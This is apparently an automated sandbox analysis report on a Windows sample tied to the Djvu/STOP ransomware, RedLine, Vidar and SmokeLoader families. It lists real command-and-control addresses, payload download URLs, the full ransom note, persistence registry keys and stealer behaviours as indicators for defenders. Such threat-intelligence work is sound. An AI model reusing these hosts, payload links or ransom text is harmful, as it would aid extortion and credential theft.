djvu | 482423e08c7cace761ffa2e191e84ee672b7778dbb0c6a37e1e23c8c22061e08

Analysis

max time kernel
80s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
13-11-2022 16:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

343ad489a8b48de4c33891a0f4e2772a8b969d0b12ec8a9b0808d1887443cc00.exe
Size

174KB
MD5

f5c178148b3caf9df80d0ebdad21247f
SHA1

ff30214f2095dc71308dac946fe15e087cfd6e14
SHA256

343ad489a8b48de4c33891a0f4e2772a8b969d0b12ec8a9b0808d1887443cc00
SHA512

d6514b82e3c37762379a795df9abc843c58854480fab34d7cdb311f808b2c62ef9f8b7b00673bce54254915d6ceb9ce4635d112f2ef591cdebe43535a6c98a0b
SSDEEP

3072:c9MHdH9ELRw1N2r/zRuJKmRXojVnGYK9cwLAJZFziYY:r8LRw1N2LxmhkVGYK9XLiZFz

Score

10^/10

djvu redline smokeloader vidar 517 mario23_10 new1113 backdoor collection discovery evasion exploit infostealer persistence ransomware spyware stealer themida trojan

Malware Config

Extracted

Family

redline

Botnet

mario23_10

167.235.252.160:10642

Attributes

auth_value
eca57cfb5172f71dc45986763bb98942

Extracted

Family

djvu

http://fresherlights.com/lancer/get.php

Attributes

extension
.fate
offline_id
5IRhyFuF3rXlXBvF6jAWjHEAnAb432icDCcvZyt1
payload_url
http://uaery.top/dl/build2.exe

http://fresherlights.com/files/1/build3.exe
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-4wOUlYSwGo Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0603Jhyjd

rsa_pubkey.plain

Extracted

Family

vidar

Version

55.6

Botnet

517

https://t.me/seclab_new

https://mas.to/@ofadex

Attributes

profile_id
517

Extracted

Family

redline

Botnet

new1113

jalocliche.xyz:81

chardhesha.xyz:81

Attributes

auth_value
bce8d71b3146db7b78f06ec6ae28bdd9

Signatures

Detected Djvu ransomware 10 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1408-180-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/1408-183-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/3816-187-0x00000000022B0000-0x00000000023CB000-memory.dmp	family_djvu
behavioral2/memory/1408-186-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/1408-194-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/1408-199-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/5000-203-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/5000-206-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/5000-213-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/5000-256-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu

Detects Smokeloader packer 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4156-133-0x0000000000720000-0x0000000000729000-memory.dmp	family_smokeloader
behavioral2/memory/4900-156-0x0000000002040000-0x0000000002049000-memory.dmp	family_smokeloader
behavioral2/memory/4472-167-0x0000000000800000-0x0000000000809000-memory.dmp	family_smokeloader

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/100-140-0x0000000000700000-0x0000000000760000-memory.dmp	family_redline
behavioral2/memory/1652-334-0x0000000000400000-0x0000000000428000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

7568.exeBrowserUpdate.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	7568.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	BrowserUpdate.exe

Downloads MZ/PE file

Executes dropped EXE 25 IoCs

Processes:

DDA3.exeE053.exeE120.exeE41E.exeE681.exeEE04.exeEE04.exeEE04.exeEE04.exebuild2.exebuild2.exebuild3.exe527C.exe5E35.exeEAEHCHcAAKSescACHUHCAAHKhACsKfCeCHhFCAHFAEehaheeHsAKhuh.exeLYKAA.exe7568.exe83D0.exe8875.exeBrowser Update.exeBrowserUpdate.exeminer2.exeAB50.exeAFD5.exemstsca.exe

pid	process
2112	DDA3.exe
4900	E053.exe
3748	E120.exe
4472	E41E.exe
3540	E681.exe
3816	EE04.exe
1408	EE04.exe
4244	EE04.exe
5000	EE04.exe
2620	build2.exe
3980	build2.exe
3532	build3.exe
4784	527C.exe
3460	5E35.exe
3876	EAEHCHcAAKSescACHUHCAAHKhACsKfCeCHhFCAHFAEehaheeHsAKhuh.exe
1844	LYKAA.exe
2144	7568.exe
4560	83D0.exe
2208	8875.exe
4692	Browser Update.exe
2264	BrowserUpdate.exe
4360	miner2.exe
2608	AB50.exe
3524	AFD5.exe
4252	mstsca.exe

Possible privilege escalation attempt 3 IoCs
exploit

Processes:

takeown.exeicacls.exeicacls.exe

pid process

4084 takeown.exe
2476 icacls.exe
4216 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
4084	takeown.exe
2476	icacls.exe
4216	icacls.exe

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

7568.exeBrowserUpdate.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	7568.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	7568.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	BrowserUpdate.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	BrowserUpdate.exe

Checks computer location settings 2 TTPs 10 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EE04.exeBrowser Update.exe83D0.exeBrowserUpdate.exeminer2.exeEE04.exebuild2.exe5E35.exeLYKAA.exe7568.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	EE04.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	Browser Update.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	83D0.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	BrowserUpdate.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	miner2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	EE04.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	build2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	5E35.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	LYKAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	7568.exe

Loads dropped DLL 3 IoCs

Processes:

regsvr32.exebuild2.exe

pid process

3572 regsvr32.exe
3980 build2.exe
3980 build2.exe
Modifies file permissions 1 TTPs 3 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exetakeown.exeicacls.exe

pid process

4216 icacls.exe
4084 takeown.exe
2476 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
3572	regsvr32.exe
3980	build2.exe
3980	build2.exe

pid	process
4216	icacls.exe
4084	takeown.exe
2476	icacls.exe

Themida packer 11 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7568.exe	themida
behavioral2/memory/2144-284-0x0000000000AF0000-0x0000000000F85000-memory.dmp	themida
behavioral2/memory/2144-285-0x0000000000AF0000-0x0000000000F85000-memory.dmp	themida
C:\Users\Admin\AppData\Local\Temp\7568.exe	themida
behavioral2/memory/2144-288-0x0000000000AF0000-0x0000000000F85000-memory.dmp	themida
C:\Program Files\Google\Chrome\Application\BrowserUpdate.exe	themida
C:\Program Files\Google\Chrome\Application\BrowserUpdate.exe	themida
behavioral2/memory/2264-305-0x0000000000F20000-0x0000000001906000-memory.dmp	themida
behavioral2/memory/2144-310-0x0000000000AF0000-0x0000000000F85000-memory.dmp	themida
behavioral2/memory/2264-307-0x0000000000F20000-0x0000000001906000-memory.dmp	themida
behavioral2/memory/2264-313-0x0000000000F20000-0x0000000001906000-memory.dmp	themida

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

Processes:

explorer.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe
Key opened	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe
Key opened	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Browser Update.exeEE04.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	Browser Update.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Google LLC = "C:\\Program Files\\Google\\Chrome\\Application\\BrowserUpdate.exe -l [email protected]"	Browser Update.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\a4ee222b-bf04-44ac-9a5c-fd2a0c77697a\\EE04.exe\" --AutoStart"	EE04.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

7568.exeBrowserUpdate.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	7568.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	BrowserUpdate.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

43 api.2ip.ua
45 api.2ip.ua
57 api.2ip.ua
219 ip-api.com

flow	ioc
43	api.2ip.ua
45	api.2ip.ua
57	api.2ip.ua
219	ip-api.com

Suspicious use of SetThreadContext 5 IoCs

Processes:

DDA3.exeEE04.exeEE04.exebuild2.exeAFD5.exe

description	pid	process	target process
PID 2112 set thread context of 100	2112	DDA3.exe	AppLaunch.exe
PID 3816 set thread context of 1408	3816	EE04.exe	EE04.exe
PID 4244 set thread context of 5000	4244	EE04.exe	EE04.exe
PID 2620 set thread context of 3980	2620	build2.exe	build2.exe
PID 3524 set thread context of 1652	3524	AFD5.exe	vbc.exe

Drops file in Program Files directory 1 IoCs

Processes:

Browser Update.exe

description ioc process

File opened for modification C:\Program Files\Google\Chrome\Application\BrowserUpdate.exe Browser Update.exe
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

2932 sc.exe
4972 sc.exe
3532 sc.exe
3212 sc.exe
1076 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 4 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid pid_target process target process

4296 3748 WerFault.exe E120.exe
4768 4472 WerFault.exe E41E.exe
4416 3540 WerFault.exe E681.exe
2416 2208 WerFault.exe 8875.exe

description	ioc	process
File opened for modification	C:\Program Files\Google\Chrome\Application\BrowserUpdate.exe	Browser Update.exe

pid	process
2932	sc.exe
4972	sc.exe
3532	sc.exe
3212	sc.exe
1076	sc.exe

pid	pid_target	process	target process
4296	3748	WerFault.exe	E120.exe
4768	4472	WerFault.exe	E41E.exe
4416	3540	WerFault.exe	E681.exe
2416	2208	WerFault.exe	8875.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

343ad489a8b48de4c33891a0f4e2772a8b969d0b12ec8a9b0808d1887443cc00.exeE053.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	343ad489a8b48de4c33891a0f4e2772a8b969d0b12ec8a9b0808d1887443cc00.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	343ad489a8b48de4c33891a0f4e2772a8b969d0b12ec8a9b0808d1887443cc00.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	343ad489a8b48de4c33891a0f4e2772a8b969d0b12ec8a9b0808d1887443cc00.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	E053.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	E053.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	E053.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

build2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	build2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	build2.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

4864 schtasks.exe
3216 schtasks.exe
1336 schtasks.exe
Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

820 timeout.exe
5036 timeout.exe
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.

Processes:

description flow ioc

HTTP User-Agent header 224 Go-http-client/1.1

pid	process
4864	schtasks.exe
3216	schtasks.exe
1336	schtasks.exe

pid	process
820	timeout.exe
5036	timeout.exe

description	flow	ioc
HTTP User-Agent header	224	Go-http-client/1.1

Modifies registry class 3 IoCs

Processes:

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\

Modifies registry key 1 TTPs 9 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid process

3220 reg.exe
1984 reg.exe
3852 reg.exe
2184 reg.exe
3232 reg.exe
4388 reg.exe
2020 reg.exe
3920 reg.exe
4248 reg.exe

pid	process
3220	reg.exe
1984	reg.exe
3852	reg.exe
2184	reg.exe
3232	reg.exe
4388	reg.exe
2020	reg.exe
3920	reg.exe
4248	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

343ad489a8b48de4c33891a0f4e2772a8b969d0b12ec8a9b0808d1887443cc00.exe

pid	process
4156	343ad489a8b48de4c33891a0f4e2772a8b969d0b12ec8a9b0808d1887443cc00.exe
4156	343ad489a8b48de4c33891a0f4e2772a8b969d0b12ec8a9b0808d1887443cc00.exe
2592
2592
2592
2592
2592
2592
2592
2592
2592
2592
2592
2592
2592
2592
2592
2592
2592
2592
2592
2592
2592
2592
2592
2592
2592
2592
2592
2592
2592
2592
2592
2592
2592
2592
2592
2592
2592
2592
2592
2592
2592
2592
2592
2592
2592
2592
2592
2592
2592
2592
2592
2592
2592
2592
2592
2592
2592
2592
2592
2592
2592
2592

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

2592
Suspicious behavior: MapViewOfSection 12 IoCs

Processes:

343ad489a8b48de4c33891a0f4e2772a8b969d0b12ec8a9b0808d1887443cc00.exeE053.exe

pid process

4156 343ad489a8b48de4c33891a0f4e2772a8b969d0b12ec8a9b0808d1887443cc00.exe
2592
2592
2592
2592
4900 E053.exe
2592
2592
2592
2592
2592
2592

pid	process
2592

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

AppLaunch.exeEAEHCHcAAKSescACHUHCAAHKhACsKfCeCHhFCAHFAEehaheeHsAKhuh.exeLYKAA.exe83D0.exe8875.exeminer2.exe

description	pid	process
Token: SeShutdownPrivilege	2592
Token: SeCreatePagefilePrivilege	2592
Token: SeShutdownPrivilege	2592
Token: SeCreatePagefilePrivilege	2592
Token: SeShutdownPrivilege	2592
Token: SeCreatePagefilePrivilege	2592
Token: SeShutdownPrivilege	2592
Token: SeCreatePagefilePrivilege	2592
Token: SeShutdownPrivilege	2592
Token: SeCreatePagefilePrivilege	2592
Token: SeShutdownPrivilege	2592
Token: SeCreatePagefilePrivilege	2592
Token: SeShutdownPrivilege	2592
Token: SeCreatePagefilePrivilege	2592
Token: SeShutdownPrivilege	2592
Token: SeCreatePagefilePrivilege	2592
Token: SeShutdownPrivilege	2592
Token: SeCreatePagefilePrivilege	2592
Token: SeDebugPrivilege	100	AppLaunch.exe
Token: SeShutdownPrivilege	2592
Token: SeCreatePagefilePrivilege	2592
Token: SeShutdownPrivilege	2592
Token: SeCreatePagefilePrivilege	2592
Token: SeShutdownPrivilege	2592
Token: SeCreatePagefilePrivilege	2592
Token: SeShutdownPrivilege	2592
Token: SeCreatePagefilePrivilege	2592
Token: SeDebugPrivilege	3876	EAEHCHcAAKSescACHUHCAAHKhACsKfCeCHhFCAHFAEehaheeHsAKhuh.exe
Token: SeDebugPrivilege	1844	LYKAA.exe
Token: SeShutdownPrivilege	2592
Token: SeCreatePagefilePrivilege	2592
Token: SeShutdownPrivilege	2592
Token: SeCreatePagefilePrivilege	2592
Token: SeShutdownPrivilege	2592
Token: SeCreatePagefilePrivilege	2592
Token: SeDebugPrivilege	4560	83D0.exe
Token: SeDebugPrivilege	2208	8875.exe
Token: SeShutdownPrivilege	2592
Token: SeCreatePagefilePrivilege	2592
Token: SeShutdownPrivilege	2592
Token: SeCreatePagefilePrivilege	2592
Token: SeShutdownPrivilege	2592
Token: SeCreatePagefilePrivilege	2592
Token: SeShutdownPrivilege	2592
Token: SeCreatePagefilePrivilege	2592
Token: SeShutdownPrivilege	2592
Token: SeCreatePagefilePrivilege	2592
Token: SeShutdownPrivilege	2592
Token: SeCreatePagefilePrivilege	2592
Token: SeShutdownPrivilege	2592
Token: SeCreatePagefilePrivilege	2592
Token: SeShutdownPrivilege	2592
Token: SeCreatePagefilePrivilege	2592
Token: SeShutdownPrivilege	2592
Token: SeCreatePagefilePrivilege	2592
Token: SeShutdownPrivilege	2592
Token: SeCreatePagefilePrivilege	2592
Token: SeShutdownPrivilege	2592
Token: SeCreatePagefilePrivilege	2592
Token: SeDebugPrivilege	4360	miner2.exe
Token: SeShutdownPrivilege	2592
Token: SeCreatePagefilePrivilege	2592
Token: SeShutdownPrivilege	2592
Token: SeCreatePagefilePrivilege	2592

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

pid process

2592
2592

pid	process
2592
2592

Suspicious use of SetWindowsHookEx 8 IoCs

Processes:

Browser Update.exeBrowserUpdate.exe

pid	process
4692	Browser Update.exe
2264	BrowserUpdate.exe
2264	BrowserUpdate.exe
2264	BrowserUpdate.exe
2264	BrowserUpdate.exe
2264	BrowserUpdate.exe
2264	BrowserUpdate.exe
2264	BrowserUpdate.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

DDA3.exeregsvr32.exeEE04.exeEE04.exeEE04.exeEE04.exe

description	pid	process	target process
PID 2592 wrote to memory of 2112	2592		DDA3.exe
PID 2592 wrote to memory of 2112	2592		DDA3.exe
PID 2592 wrote to memory of 2112	2592		DDA3.exe
PID 2112 wrote to memory of 100	2112	DDA3.exe	AppLaunch.exe
PID 2112 wrote to memory of 100	2112	DDA3.exe	AppLaunch.exe
PID 2112 wrote to memory of 100	2112	DDA3.exe	AppLaunch.exe
PID 2112 wrote to memory of 100	2112	DDA3.exe	AppLaunch.exe
PID 2112 wrote to memory of 100	2112	DDA3.exe	AppLaunch.exe
PID 2592 wrote to memory of 4900	2592		E053.exe
PID 2592 wrote to memory of 4900	2592		E053.exe
PID 2592 wrote to memory of 4900	2592		E053.exe
PID 2592 wrote to memory of 3748	2592		E120.exe
PID 2592 wrote to memory of 3748	2592		E120.exe
PID 2592 wrote to memory of 3748	2592		E120.exe
PID 2592 wrote to memory of 4472	2592		E41E.exe
PID 2592 wrote to memory of 4472	2592		E41E.exe
PID 2592 wrote to memory of 4472	2592		E41E.exe
PID 2592 wrote to memory of 3540	2592		E681.exe
PID 2592 wrote to memory of 3540	2592		E681.exe
PID 2592 wrote to memory of 3540	2592		E681.exe
PID 2592 wrote to memory of 2740	2592		regsvr32.exe
PID 2592 wrote to memory of 2740	2592		regsvr32.exe
PID 2740 wrote to memory of 3572	2740	regsvr32.exe	regsvr32.exe
PID 2740 wrote to memory of 3572	2740	regsvr32.exe	regsvr32.exe
PID 2740 wrote to memory of 3572	2740	regsvr32.exe	regsvr32.exe
PID 2592 wrote to memory of 3816	2592		EE04.exe
PID 2592 wrote to memory of 3816	2592		EE04.exe
PID 2592 wrote to memory of 3816	2592		EE04.exe
PID 2592 wrote to memory of 5076	2592		explorer.exe
PID 2592 wrote to memory of 5076	2592		explorer.exe
PID 2592 wrote to memory of 5076	2592		explorer.exe
PID 2592 wrote to memory of 5076	2592		explorer.exe
PID 3816 wrote to memory of 1408	3816	EE04.exe	EE04.exe
PID 3816 wrote to memory of 1408	3816	EE04.exe	EE04.exe
PID 3816 wrote to memory of 1408	3816	EE04.exe	EE04.exe
PID 3816 wrote to memory of 1408	3816	EE04.exe	EE04.exe
PID 3816 wrote to memory of 1408	3816	EE04.exe	EE04.exe
PID 3816 wrote to memory of 1408	3816	EE04.exe	EE04.exe
PID 3816 wrote to memory of 1408	3816	EE04.exe	EE04.exe
PID 3816 wrote to memory of 1408	3816	EE04.exe	EE04.exe
PID 3816 wrote to memory of 1408	3816	EE04.exe	EE04.exe
PID 3816 wrote to memory of 1408	3816	EE04.exe	EE04.exe
PID 2592 wrote to memory of 4180	2592		explorer.exe
PID 2592 wrote to memory of 4180	2592		explorer.exe
PID 2592 wrote to memory of 4180	2592		explorer.exe
PID 1408 wrote to memory of 4216	1408	EE04.exe	icacls.exe
PID 1408 wrote to memory of 4216	1408	EE04.exe	icacls.exe
PID 1408 wrote to memory of 4216	1408	EE04.exe	icacls.exe
PID 1408 wrote to memory of 4244	1408	EE04.exe	EE04.exe
PID 1408 wrote to memory of 4244	1408	EE04.exe	EE04.exe
PID 1408 wrote to memory of 4244	1408	EE04.exe	EE04.exe
PID 4244 wrote to memory of 5000	4244	EE04.exe	EE04.exe
PID 4244 wrote to memory of 5000	4244	EE04.exe	EE04.exe
PID 4244 wrote to memory of 5000	4244	EE04.exe	EE04.exe
PID 4244 wrote to memory of 5000	4244	EE04.exe	EE04.exe
PID 4244 wrote to memory of 5000	4244	EE04.exe	EE04.exe
PID 4244 wrote to memory of 5000	4244	EE04.exe	EE04.exe
PID 4244 wrote to memory of 5000	4244	EE04.exe	EE04.exe
PID 4244 wrote to memory of 5000	4244	EE04.exe	EE04.exe
PID 4244 wrote to memory of 5000	4244	EE04.exe	EE04.exe
PID 4244 wrote to memory of 5000	4244	EE04.exe	EE04.exe
PID 5000 wrote to memory of 2620	5000	EE04.exe	build2.exe
PID 5000 wrote to memory of 2620	5000	EE04.exe	build2.exe
PID 5000 wrote to memory of 2620	5000	EE04.exe	build2.exe

outlook_office_path 1 IoCs

Processes:

explorer.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe

outlook_win_path 1 IoCs

Processes:

explorer.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe

C:\Users\Admin\AppData\Local\Temp\343ad489a8b48de4c33891a0f4e2772a8b969d0b12ec8a9b0808d1887443cc00.exe
"C:\Users\Admin\AppData\Local\Temp\343ad489a8b48de4c33891a0f4e2772a8b969d0b12ec8a9b0808d1887443cc00.exe"
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4156

C:\Users\Admin\AppData\Local\Temp\DDA3.exe
C:\Users\Admin\AppData\Local\Temp\DDA3.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2112

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:100

C:\Users\Admin\AppData\Local\Temp\E053.exe
C:\Users\Admin\AppData\Local\Temp\E053.exe
1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4900

C:\Users\Admin\AppData\Local\Temp\E120.exe
C:\Users\Admin\AppData\Local\Temp\E120.exe
1⤵
- Executes dropped EXE
PID:3748

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3748 -s 252
2⤵
- Program crash
PID:4296

C:\Users\Admin\AppData\Local\Temp\E41E.exe
C:\Users\Admin\AppData\Local\Temp\E41E.exe
1⤵
- Executes dropped EXE
PID:4472

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 340
2⤵
- Program crash
PID:4768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3748 -ip 3748
1⤵
PID:2080

C:\Users\Admin\AppData\Local\Temp\E681.exe
C:\Users\Admin\AppData\Local\Temp\E681.exe
1⤵
- Executes dropped EXE
PID:3540

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3540 -s 340
2⤵
- Program crash
PID:4416

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 4472 -ip 4472
1⤵
PID:4724

C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\EBE1.dll
1⤵
- Suspicious use of WriteProcessMemory
PID:2740

C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\EBE1.dll
2⤵
- Loads dropped DLL
PID:3572

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 3540 -ip 3540
1⤵
PID:1592

